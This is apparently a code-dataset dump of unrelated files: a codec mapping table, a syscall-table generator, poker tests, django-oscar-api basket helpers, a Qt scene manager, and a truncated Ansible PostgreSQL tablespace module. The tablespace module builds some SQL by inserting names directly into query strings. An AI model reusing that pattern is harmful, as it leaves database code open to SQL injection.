0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03c9, # GREEK SMALL LETTER OMEGA
0x00e1: 0x03ac, # GREEK SMALL LETTER ALPHA WITH TONOS
0x00e2: 0x03ad, # GREEK SMALL LETTER EPSILON WITH TONOS
0x00e3: 0x03ae, # GREEK SMALL LETTER ETA WITH TONOS
0x00e4: 0x03ca, # GREEK SMALL LETTER IOTA WITH DIALYTIKA
0x00e5: 0x03af, # GREEK SMALL LETTER IOTA WITH TONOS
0x00e6: 0x03cc, # GREEK SMALL LETTER OMICRON WITH TONOS
0x00e7: 0x03cd, # GREEK SMALL LETTER UPSILON WITH TONOS
0x00e8: 0x03cb, # GREEK SMALL LETTER UPSILON WITH DIALYTIKA
0x00e9: 0x03ce, # GREEK SMALL LETTER OMEGA WITH TONOS
0x00ea: 0x0386, # GREEK CAPITAL LETTER ALPHA WITH TONOS
0x00eb: 0x0388, # GREEK CAPITAL LETTER EPSILON WITH TONOS
0x00ec: 0x0389, # GREEK CAPITAL LETTER ETA WITH TONOS
0x00ed: 0x038a, # GREEK CAPITAL LETTER IOTA WITH TONOS
0x00ee: 0x038c, # GREEK CAPITAL LETTER OMICRON WITH TONOS
0x00ef: 0x038e, # GREEK CAPITAL LETTER UPSILON WITH TONOS
0x00f0: 0x038f, # GREEK CAPITAL LETTER OMEGA WITH TONOS
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x03aa, # GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
0x00f5: 0x03ab, # GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
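### Illustrative round trip (not part of the generated file): byte 0x80 maps
### to U+0391 (GREEK CAPITAL LETTER ALPHA) in the tables above.
assert Codec().decode('\x80')[0] == u'\u0391'
assert Codec().encode(u'\u0391')[0] == '\x80'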
| gpl-3.0 | 5,513,657,414,712,581,000 | 40.773256 | 79 | 0.735626 | false |
sebastiaangroot/kmaldetect | tools/build/gen_syscall_table.py | 1 | 1860 | """
A simple python script to generate a sh function that takes the name of a syscall as input and translates it to the number corresponding to that syscall.
The generated function is used in the sig_gen.sh script, which generates an application signature for detection in kmaldetect.
Keep in mind that the '\n' characters used here will be translated to your OS's newline convention.
"""
import sys
import getopt
def gen_function(content, f):
f.write('function get_syscall_index\n')
f.write('{\n')
f.write('\tcase $1 in\n')
for line in content:
if line.startswith('#define __NR_') and line.find('stub_') == -1:
if line[9:].find('\t') != -1:
num = line[line.find('\t', line.find('__NR_')):].lstrip('\t').strip() #num = the characters after the tab / whitespace characters, after the _NR__
name = line[line.find('__NR_') + 5:].split('\t')[0] #name = the characters after the _NR__ but before the tab / whitespace characters
elif line[9:].find(' ') != -1:
num = line[line.find(' ', line.find('__NR_')):].lstrip(' ').strip()
name = line[line.find('__NR_') + 5:].split(' ')[0]
else: #There has to be a space or tab after the #define _NR__xxx. This was not the case, so call continue on the for loop
continue
f.write('\t\t\'' + name + '\')\n')
f.write('\t\t\treturn ' + num + '\n')
f.write('\t\t\t;;\n')
f.write('\tesac\n')
f.write('}\n')
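# Example of the generated shell function (illustrative; with an x86_64
# unistd_64.h the first entries would look like this, but the actual names
# and numbers depend entirely on the header passed via --infile):
#
# function get_syscall_index
# {
# 	case $1 in
# 		'read')
# 			return 0
# 			;;
# 		'write')
# 			return 1
# 			;;
# 	esac
# }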
infile = '' # path to the unistd_xx.h header
outfile = '' # path to the outfile, which will be filled with a .sh function for the use in sig_gen.sh
content = '' # content of infile
opts, args = getopt.getopt(sys.argv[1:], 'i:o:', ['infile=', 'outfile='])
for o, a in opts:
if o in ('--infile', '-i'):
infile = a
elif o in ('--outfile', '-o'):
outfile = a
with open(infile, 'r') as f:
content = f.readlines()
f = open(outfile, 'a')
gen_function(content, f)
f.flush()
f.close() | gpl-2.0 | 9,037,986,725,254,694,000 | 38.595745 | 152 | 0.634409 | false |
nodermann/holdem_poker_combinations | tests.py | 1 | 1924 | __author__ = 'Lucian'
from poker_combinations import get_combo_name
from sort import sort_high_to_low, sort_by_color
from const import values, colors, color_names
import time
def get_deck():
deck = []
for i, color in enumerate(colors):
for value in list(reversed(values)):
deck.append(value + color)
print color_names[i]
print " ".join(deck[i * 13:len(deck)])
return deck
def timer(f):
def tmp(*args, **kwargs):
t = time.time()
res = f(*args, **kwargs)
print "per %f" % (time.time()-t)
return res
return tmp
@timer
def test_get_combo_name():
sample_cards = ["AS QS TS JS KS", "AC JC TC QC KC", "7C 6C TC 8C 9C", "7D 4D 5D 3D 6D",
"3H 4H 5H AH 2H", "9H JD 9S 9C 9D", "9H 5S 9S 9C 9D", "9H QS QD QC 9D",
"QH 3S QD QC 3D", "JS 2S 4S KS 7S", "JC 2C QC 5C 7C", "8C 2C QC 5C 7C",
"8C 2C QC 5C 6C", "7C 6S 5D 8H 9C", "2D 4C 5S 3D 6H", "3H 4H 5D AD 2S",
"5H 4C QD QC QS", "5H TH 6D TC TS", "5H TH 4D TC TS", "5H TH 3D TC TS",
"9H KH 9D KC 2S", "4D 4H JD JH AC", "4D 4H JD JH TS", "AD 4H JD 7H AS",
"AD TH TD 7H 8S", "6D TH TD 4H 5S", "6D TH TD 4H 3S", "6D TH TD 4H 2S",
"6D AH TD 4H 2S", "8D 5H 7D JH 2S", "8D 5H 6D JH 2S", "8D 4H 6D JH 2S"]
for card_set in sample_cards:
cards = card_set.split(" ")
cards = sort_high_to_low(cards)
print str(cards) + ' ' + get_combo_name(cards)
def test_sort_by_color():
cards = "5H 4C QD QC QS".split(" ")
print sort_by_color(cards)
def test_sort_high_to_low():
cards = "8D 5H 6D JH 2S".split(" ")
print sort_high_to_low(cards)
if __name__ == "__main__":
#test_sort_by_color()
#test_sort_high_to_low()
#get_deck()
test_get_combo_name() | mit | 5,263,241,053,939,743,000 | 31.206897 | 91 | 0.515593 | false |
lijoantony/django-oscar-api | oscarapi/basket/operations.py | 1 | 3871 | "This module contains operations on baskets and lines"
from django.conf import settings
from oscar.core.loading import get_model, get_class
from oscar.core.utils import get_default_currency
from oscar.core.prices import Price
__all__ = (
'apply_offers',
'assign_basket_strategy',
'prepare_basket',
'get_basket',
'get_basket_id_from_session',
'get_anonymous_basket',
'get_user_basket',
'store_basket_in_session',
'request_contains_basket',
'flush_and_delete_basket',
'request_contains_line',
'save_line_with_default_currency',
)
Basket = get_model('basket', 'Basket')
Applicator = get_class('offer.utils', 'Applicator')
Selector = None
def apply_offers(request, basket):
"Apply offers and discounts to cart"
if not basket.is_empty:
Applicator().apply(request, basket)
def assign_basket_strategy(basket, request):
# fixes too early import of Selector
# TODO: check if this is still true, now the basket models nolonger
# require this module to be loaded.
global Selector
if hasattr(request, 'strategy'):
basket.strategy = request.strategy
else: # in management commands, the request might not be available.
if Selector is None:
Selector = get_class('partner.strategy', 'Selector')
basket.strategy = Selector().strategy(
request=request, user=request.user)
apply_offers(request, basket)
return basket
def prepare_basket(basket, request):
assign_basket_strategy(basket, request)
store_basket_in_session(basket, request.session)
return basket
def get_basket(request, prepare=True):
"Get basket from the request."
if request.user.is_authenticated():
basket = get_user_basket(request.user)
else:
basket = get_anonymous_basket(request)
if basket is None:
basket = Basket.objects.create()
basket.save()
return prepare_basket(basket, request) if prepare else basket
def get_basket_id_from_session(request):
return request.session.get(settings.OSCAR_BASKET_COOKIE_OPEN)
def editable_baskets():
return Basket.objects.filter(status__in=["Open", "Saved"])
def get_anonymous_basket(request):
"Get basket from session."
basket_id = get_basket_id_from_session(request)
try:
basket = editable_baskets().get(pk=basket_id)
except Basket.DoesNotExist:
basket = None
return basket
def get_user_basket(user):
"get basket for a user."
try:
basket, __ = editable_baskets().get_or_create(owner=user)
except Basket.MultipleObjectsReturned:
# Not sure quite how we end up here with multiple baskets.
# We merge them and create a fresh one
old_baskets = list(editable_baskets().filter(owner=user))
basket = old_baskets[0]
for other_basket in old_baskets[1:]:
basket.merge(other_basket, add_quantities=False)
return basket
def store_basket_in_session(basket, session):
session[settings.OSCAR_BASKET_COOKIE_OPEN] = basket.pk
session.save()
def request_contains_basket(request, basket):
if basket.can_be_edited:
if request.user.is_authenticated():
return request.user == basket.owner
return get_basket_id_from_session(request) == basket.pk
return False
def flush_and_delete_basket(basket, using=None):
"Delete basket and all lines"
basket.flush()
basket.delete(using)
def request_contains_line(request, line):
basket = get_basket(request, prepare=False)
if basket and basket.pk == line.basket.pk:
return request_contains_basket(request, basket)
return False
def save_line_with_default_currency(line, *args, **kwargs):
if not line.price_currency:
line.price_currency = get_default_currency()
return line.save(*args, **kwargs)
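# --- Illustrative usage (a sketch, not part of the original module) ---
# A typical request flow using only the helpers defined above; `request` is a
# normal Django request carrying a session and a (possibly anonymous) user.
def _example_update_line(request, line):
    basket = get_basket(request)  # prepared: strategy assigned, offers applied
    if request_contains_line(request, line):
        save_line_with_default_currency(line)
    return basket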
| bsd-3-clause | 7,321,325,571,453,484,000 | 27.463235 | 72 | 0.675794 | false |
mtils/ems | ems/qt/graphics/scene_manager.py | 1 | 7140 |
from ems.typehint import accepts
from ems.qt.event_hook_proxy import SignalEventHookProxy
from ems.qt import QtWidgets, QtGui, QtCore, QtPrintSupport
from ems.qt.graphics.graphics_scene import GraphicsScene, BackgroundCorrector
from ems.qt.graphics.graphics_widget import GraphicsWidget
from ems.qt.graphics.storage.interfaces import SceneStorageManager
from ems.qt.graphics.tool import GraphicsTool
from ems.qt.graphics.tool import GraphicsToolDispatcher
from ems.qt.graphics.text_tool import TextTool
from ems.qt.graphics.pixmap_tool import PixmapTool
from ems.qt.graphics.interfaces import Finalizer
from ems.qt.graphics.page_item import PageItemHider, PageItem
Qt = QtCore.Qt
QObject = QtCore.QObject
QRectF = QtCore.QRectF
pyqtProperty = QtCore.pyqtProperty
pyqtSlot = QtCore.pyqtSlot
QWidget = QtWidgets.QWidget
QVBoxLayout = QtWidgets.QVBoxLayout
QToolBar = QtWidgets.QToolBar
QSlider = QtWidgets.QSlider
QAction = QtWidgets.QAction
QKeySequence = QtGui.QKeySequence
QPrintPreviewDialog = QtPrintSupport.QPrintPreviewDialog
QPainter = QtGui.QPainter
class SceneManager(QObject):
def __init__(self, parent=None, storageManager=None):
super(SceneManager, self).__init__(parent)
self._scene = None
self._widget = None
self._tools = None
self._storageManager = None
self._importStorageManager = None
self._loadAction = None
self._saveAction = None
self._importAction = None
self._exportAction = None
self._actions = []
self._finalizers = [BackgroundCorrector(), PageItemHider()]
if storageManager:
self.setStorageManager(storageManager)
def actions(self):
if not self._actions:
self._populateActions()
return self._actions
def getScene(self):
if not self._scene:
self._scene = GraphicsScene()
self._scene.deleteRequested.connect(self.deleteIfWanted)
return self._scene
scene = pyqtProperty(GraphicsScene, getScene)
def getWidget(self):
if not self._widget:
self._widget = GraphicsWidget(scene=self.scene, tools=self.tools)
self._addActionsToWidget(self._widget)
self._widget.printPreviewRequested.connect(self.showPrintPreviewDialog)
return self._widget
widget = pyqtProperty(GraphicsWidget, getWidget)
def getTools(self):
if not self._tools:
self._tools = self._createTools()
return self._tools
tools = pyqtProperty(GraphicsTool, getTools)
def load(self, *args):
if self._storageManager:
return self._storageManager.load()
def save(self, *args):
if self._storageManager:
return self._storageManager.save()
def importScene(self, *args):
if self._importStorageManager:
return self._importStorageManager.load()
def exportScene(self, *args):
if self._importStorageManager:
return self._importStorageManager.save()
def getStorageManager(self):
return self._storageManager
@pyqtSlot(SceneStorageManager)
def setStorageManager(self, storageManager):
self._storageManager = storageManager
self._storageManager.setScene(self.scene)
self._storageManager.setTools(self.tools)
storageManager = pyqtProperty(SceneStorageManager, getStorageManager, setStorageManager)
def getImportStorageManager(self):
return self._importStorageManager
def setImportStorageManager(self, storageManager):
self._importStorageManager = storageManager
self._importStorageManager.setScene(self.scene)
self._importStorageManager.setTools(self.tools)
importStorageManager = pyqtProperty(SceneStorageManager, getImportStorageManager, setImportStorageManager)
@property
def loadAction(self):
if self._loadAction:
return self._loadAction
self._loadAction = QAction('Load', self.getWidget(), shortcut = QKeySequence.Open)
self._loadAction.triggered.connect(self.load)
return self._loadAction
@property
def saveAction(self):
if self._saveAction:
return self._saveAction
self._saveAction = QAction('Save', self.getWidget(), shortcut = QKeySequence.Save)
self._saveAction.triggered.connect(self.save)
return self._saveAction
@property
def importAction(self):
if self._importAction:
return self._importAction
self._importAction = QAction('Import', self.getWidget())
self._importAction.triggered.connect(self.importScene)
return self._importAction
@property
def exportAction(self):
if self._exportAction:
return self._exportAction
self._exportAction = QAction('Export', self.getWidget())
self._exportAction.triggered.connect(self.exportScene)
return self._exportAction
def printScene(self, printer, painter=None):
painter = painter if isinstance(painter, QPainter) else QPainter(printer)
for finalizer in self._finalizers:
finalizer.toFinalized(self.scene)
pageItem = self._findPageItem()
if pageItem:
self.scene.render(painter, QRectF(), pageItem.boundingRect())
else:
self.scene.render(painter)
for finalizer in self._finalizers:
finalizer.toEditable(self.scene)
def showPrintPreviewDialog(self):
margin = 30
parent = self.getWidget()
self.printPrvDlg = QPrintPreviewDialog(parent)
self.printPrvDlg.setWindowTitle(u'Druckvorschau')
self.printPrvDlg.paintRequested.connect(self.printScene)
self.printPrvDlg.resize(parent.width()-margin, parent.height()-margin)
self.printPrvDlg.show()
def deleteIfWanted(self):
items = self.scene.selectedItems()
if not len(items):
return
for item in items:
self.scene.removeItem(item)
@accepts(Finalizer)
def addFinalizer(self, finalizer):
self._finalizers.append(finalizer)
def hasFinalizer(self, finalizer):
return finalizer in self._finalizers
def finalizer(self, cls):
for finalizer in self._finalizers:
if isinstance(finalizer, cls):
return finalizer
def _createTools(self):
tools = GraphicsToolDispatcher(self)
tools.setScene(self.scene)
textTool = TextTool()
tools.addTool(textTool)
pixmapTool = PixmapTool()
tools.addTool(pixmapTool)
return tools
def _populateActions(self):
if self._actions:
return
self._actions.append(self.loadAction)
self._actions.append(self.saveAction)
self._actions.append(self.importAction)
self._actions.append(self.exportAction)
def _addActionsToWidget(self, widget):
for action in self.actions():
widget.addAction(action)
def _findPageItem(self):
for item in self.scene.items():
if isinstance(item, PageItem):
return item | mit | 2,377,236,452,932,278,300 | 32.683962 | 110 | 0.67605 | false |
pgmillon/ansible | lib/ansible/modules/database/postgresql/postgresql_tablespace.py | 1 | 16280 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Flavien Chantelot (@Dorn-)
# Copyright: (c) 2018, Antoine Levy-Lambert (@antoinell)
# Copyright: (c) 2019, Andrew Klychkov (@Andersson007) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'supported_by': 'community',
'status': ['preview']
}
DOCUMENTATION = r'''
---
module: postgresql_tablespace
short_description: Add or remove PostgreSQL tablespaces from remote hosts
description:
- Adds or removes PostgreSQL tablespaces from remote hosts
U(https://www.postgresql.org/docs/current/sql-createtablespace.html),
U(https://www.postgresql.org/docs/current/manage-ag-tablespaces.html).
version_added: '2.8'
options:
tablespace:
description:
- Name of the tablespace to add or remove.
required: true
type: str
aliases:
- name
location:
description:
- Path to the tablespace directory in the file system.
- Ensure that the location exists and has right privileges.
type: path
aliases:
- path
state:
description:
- Tablespace state.
- I(state=present) implies the tablespace must be created if it doesn't exist.
- I(state=absent) implies the tablespace must be removed if present.
        I(state=absent) is mutually exclusive with I(location), I(owner), I(rename_to), I(set).
- See the Notes section for information about check mode restrictions.
type: str
default: present
choices: [ absent, present ]
owner:
description:
- Name of the role to set as an owner of the tablespace.
- If this option is not specified, the tablespace owner is a role that creates the tablespace.
type: str
set:
description:
- Dict of tablespace options to set. Supported from PostgreSQL 9.0.
- For more information see U(https://www.postgresql.org/docs/current/sql-createtablespace.html).
- When reset is passed as an option's value, if the option was set previously, it will be removed
U(https://www.postgresql.org/docs/current/sql-altertablespace.html).
type: dict
  rename_to:
    description:
      - New name of the tablespace.
      - The new name cannot begin with pg_, as such names are reserved for system tablespaces.
    type: str
session_role:
description:
- Switch to session_role after connecting. The specified session_role must
be a role that the current login_user is a member of.
- Permissions checking for SQL commands is carried out as though
the session_role were the one that had logged in originally.
type: str
db:
description:
- Name of database to connect to and run queries against.
type: str
aliases:
- login_db
notes:
- I(state=absent) and I(state=present) (the second one if the tablespace doesn't exist) do not
support check mode because the corresponding PostgreSQL DROP and CREATE TABLESPACE commands
can not be run inside the transaction block.
author:
- Flavien Chantelot (@Dorn-)
- Antoine Levy-Lambert (@antoinell)
- Andrew Klychkov (@Andersson007)
extends_documentation_fragment: postgres
'''
EXAMPLES = r'''
- name: Create a new tablespace called acme and set bob as its owner
postgresql_tablespace:
name: acme
owner: bob
location: /data/foo
- name: Create a new tablespace called bar with tablespace options
postgresql_tablespace:
name: bar
set:
random_page_cost: 1
seq_page_cost: 1
- name: Reset random_page_cost option
postgresql_tablespace:
name: bar
set:
random_page_cost: reset
- name: Rename the tablespace from bar to pcie_ssd
postgresql_tablespace:
name: bar
rename_to: pcie_ssd
- name: Drop tablespace called bloat
postgresql_tablespace:
name: bloat
state: absent
'''
RETURN = r'''
queries:
  description: List of queries that the module tried to execute.
  returned: always
  type: list
  sample: [ "CREATE TABLESPACE bar LOCATION '/incredible/ssd'" ]
tablespace:
description: Tablespace name.
returned: always
type: str
sample: 'ssd'
owner:
description: Tablespace owner.
returned: always
type: str
sample: 'Bob'
options:
description: Tablespace options.
returned: always
type: dict
sample: { 'random_page_cost': 1, 'seq_page_cost': 1 }
location:
description: Path to the tablespace in the file system.
returned: always
type: str
sample: '/incredible/fast/ssd'
newname:
description: New tablespace name
returned: if existent
type: str
sample: new_ssd
state:
description: Tablespace state at the end of execution.
returned: always
type: str
sample: 'present'
'''
try:
from psycopg2 import __version__ as PSYCOPG2_VERSION
from psycopg2.extras import DictCursor
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT as AUTOCOMMIT
from psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED as READ_COMMITTED
except ImportError:
# psycopg2 is checked by connect_to_db()
# from ansible.module_utils.postgres
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import pg_quote_identifier
from ansible.module_utils.postgres import (
connect_to_db,
exec_sql,
get_conn_params,
postgres_common_argument_spec,
)
class PgTablespace(object):
"""Class for working with PostgreSQL tablespaces.
Args:
module (AnsibleModule) -- object of AnsibleModule class
cursor (cursor) -- cursor object of psycopg2 library
name (str) -- name of the tablespace
Attrs:
module (AnsibleModule) -- object of AnsibleModule class
cursor (cursor) -- cursor object of psycopg2 library
name (str) -- name of the tablespace
        exists (bool) -- flag indicating whether the tablespace exists in the DB
owner (str) -- tablespace owner
location (str) -- path to the tablespace directory in the file system
executed_queries (list) -- list of executed queries
new_name (str) -- new name for the tablespace
        opt_not_supported (bool) -- flag indicating that tablespace options are not supported (spcoptions is absent)
"""
def __init__(self, module, cursor, name):
self.module = module
self.cursor = cursor
self.name = name
self.exists = False
self.owner = ''
self.settings = {}
self.location = ''
self.executed_queries = []
self.new_name = ''
self.opt_not_supported = False
# Collect info:
self.get_info()
def get_info(self):
"""Get tablespace information."""
# Check that spcoptions exists:
opt = exec_sql(self, "SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spcoptions'", add_to_executed=False)
# For 9.1 version and earlier:
location = exec_sql(self, "SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spclocation'", add_to_executed=False)
if location:
location = 'spclocation'
else:
location = 'pg_tablespace_location(t.oid)'
if not opt:
self.opt_not_supported = True
query = ("SELECT r.rolname, (SELECT Null), %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
else:
query = ("SELECT r.rolname, t.spcoptions, %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
res = exec_sql(self, query, add_to_executed=False)
if not res:
self.exists = False
return False
if res[0][0]:
self.exists = True
self.owner = res[0][0]
if res[0][1]:
# Options exist:
for i in res[0][1]:
i = i.split('=')
self.settings[i[0]] = i[1]
if res[0][2]:
# Location exists:
self.location = res[0][2]
def create(self, location):
"""Create tablespace.
Return True if success, otherwise, return False.
args:
location (str) -- tablespace directory path in the FS
"""
query = ("CREATE TABLESPACE %s LOCATION '%s'" % (pg_quote_identifier(self.name, 'database'), location))
return exec_sql(self, query, ddl=True)
def drop(self):
"""Drop tablespace.
Return True if success, otherwise, return False.
"""
return exec_sql(self, "DROP TABLESPACE %s" % pg_quote_identifier(self.name, 'database'), ddl=True)
def set_owner(self, new_owner):
"""Set tablespace owner.
Return True if success, otherwise, return False.
args:
            new_owner (str) -- name of a new owner for the tablespace
"""
if new_owner == self.owner:
return False
query = "ALTER TABLESPACE %s OWNER TO %s" % (pg_quote_identifier(self.name, 'database'), new_owner)
return exec_sql(self, query, ddl=True)
def rename(self, newname):
"""Rename tablespace.
Return True if success, otherwise, return False.
args:
            newname (str) -- new name for the tablespace
"""
query = "ALTER TABLESPACE %s RENAME TO %s" % (pg_quote_identifier(self.name, 'database'), newname)
self.new_name = newname
return exec_sql(self, query, ddl=True)
def set_settings(self, new_settings):
"""Set tablespace settings (options).
If some setting has been changed, set changed = True.
        After all settings have been processed, return changed.
        args:
            new_settings (dict) -- dictionary of new settings
"""
# settings must be a dict {'key': 'value'}
if self.opt_not_supported:
return False
changed = False
# Apply new settings:
for i in new_settings:
if new_settings[i] == 'reset':
if i in self.settings:
changed = self.__reset_setting(i)
self.settings[i] = None
elif (i not in self.settings) or (str(new_settings[i]) != self.settings[i]):
changed = self.__set_setting("%s = '%s'" % (i, new_settings[i]))
return changed
def __reset_setting(self, setting):
"""Reset tablespace setting.
Return True if success, otherwise, return False.
args:
            setting (str) -- name of the setting to reset
"""
query = "ALTER TABLESPACE %s RESET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return exec_sql(self, query, ddl=True)
def __set_setting(self, setting):
"""Set tablespace setting.
Return True if success, otherwise, return False.
args:
setting (str) -- string in format "setting_name = 'setting_value'"
"""
query = "ALTER TABLESPACE %s SET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return exec_sql(self, query, ddl=True)
# ===========================================
# Module execution.
#
def main():
argument_spec = postgres_common_argument_spec()
argument_spec.update(
tablespace=dict(type='str', aliases=['name']),
state=dict(type='str', default="present", choices=["absent", "present"]),
location=dict(type='path', aliases=['path']),
owner=dict(type='str'),
set=dict(type='dict'),
rename_to=dict(type='str'),
db=dict(type='str', aliases=['login_db']),
session_role=dict(type='str'),
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=(('positional_args', 'named_args'),),
supports_check_mode=True,
)
tablespace = module.params["tablespace"]
state = module.params["state"]
location = module.params["location"]
owner = module.params["owner"]
rename_to = module.params["rename_to"]
settings = module.params["set"]
if state == 'absent' and (location or owner or rename_to or settings):
module.fail_json(msg="state=absent is mutually exclusive location, "
"owner, rename_to, and set")
conn_params = get_conn_params(module, module.params)
db_connection = connect_to_db(module, conn_params, autocommit=True)
cursor = db_connection.cursor(cursor_factory=DictCursor)
# Change autocommit to False if check_mode:
if module.check_mode:
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=False)
else:
db_connection.set_isolation_level(READ_COMMITTED)
# Set defaults:
autocommit = False
changed = False
##############
# Create PgTablespace object and do main job:
tblspace = PgTablespace(module, cursor, tablespace)
# If tablespace exists with different location, exit:
if tblspace.exists and location and location != tblspace.location:
module.fail_json(msg="Tablespace '%s' exists with different location '%s'" % (tblspace.name, tblspace.location))
# Create new tablespace:
if not tblspace.exists and state == 'present':
if rename_to:
module.fail_json(msg="Tablespace %s does not exist, nothing to rename" % tablespace)
if not location:
module.fail_json(msg="'location' parameter must be passed with "
"state=present if the tablespace doesn't exist")
# Because CREATE TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.create(location)
# Drop non-existing tablespace:
elif not tblspace.exists and state == 'absent':
# Nothing to do:
module.fail_json(msg="Tries to drop nonexistent tablespace '%s'" % tblspace.name)
# Drop existing tablespace:
elif tblspace.exists and state == 'absent':
# Because DROP TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.drop()
# Rename tablespace:
elif tblspace.exists and rename_to:
if tblspace.name != rename_to:
changed = tblspace.rename(rename_to)
if state == 'present':
# Refresh information:
tblspace.get_info()
# Change owner and settings:
if state == 'present' and tblspace.exists:
if owner:
changed = tblspace.set_owner(owner)
if settings:
changed = tblspace.set_settings(settings)
tblspace.get_info()
# Rollback if it's possible and check_mode:
if not autocommit:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
cursor.close()
db_connection.close()
# Make return values:
kw = dict(
changed=changed,
state='present',
tablespace=tblspace.name,
owner=tblspace.owner,
queries=tblspace.executed_queries,
options=tblspace.settings,
location=tblspace.location,
)
